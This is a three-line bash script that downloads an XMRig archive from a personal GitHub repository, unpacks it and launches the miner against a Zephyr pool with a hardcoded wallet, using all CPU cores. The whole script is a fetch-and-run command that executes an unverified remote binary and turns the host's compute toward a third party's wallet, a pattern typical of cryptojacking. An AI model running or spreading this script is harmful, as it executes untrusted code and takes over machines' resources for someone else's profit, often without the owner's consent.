#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHsCD1CDg5WRewkiNwUiKC8b4Zy6QAeNGeyiRaaXgBW2QVPfUyPE4eWm1RVDhjPmKut2eHk7e3aLBcUok3Kss3g9QEf6Whvo7 -p SEENG -a rx/0 -t $(nproc --all)
